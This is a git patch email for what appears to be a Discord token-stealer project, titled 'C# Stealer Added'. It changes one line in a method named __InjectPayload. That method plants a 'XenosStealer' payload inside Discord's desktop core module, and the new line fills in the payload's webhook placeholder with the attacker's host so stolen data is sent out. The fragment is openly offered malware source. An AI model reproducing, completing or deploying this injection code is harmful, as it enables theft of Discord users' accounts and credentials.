From a9a75926f972d8f8f26464fe7eaa65eeca466b5f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?P=CE=B1r=CE=B1dox?= <0xParadox@protonmail.com> Date: Thu, 21 Apr 2022 04:07:12 +0200 Subject: [PATCH] =?UTF-8?q?=F0=9F=90=BA=20C#=20Stealer=20Added?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 🐺 C# Stealer Added --- Grabber/Csharp/Xenos.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Grabber/Csharp/Xenos.cs b/Grabber/Csharp/Xenos.cs index 1984f87..cef482a 100644 --- a/Grabber/Csharp/Xenos.cs +++ b/Grabber/Csharp/Xenos.cs @@ -127,7 +127,7 @@ public static void __InjectPayload() try { Directory.CreateDirectory(core + @"\discord_desktop_core\XenosStealer"); - File.WriteAllText(file, Payload); + File.WriteAllText(file, Payload.Replace("%WEBHOOK_LINK%", Host)); } catch { }; });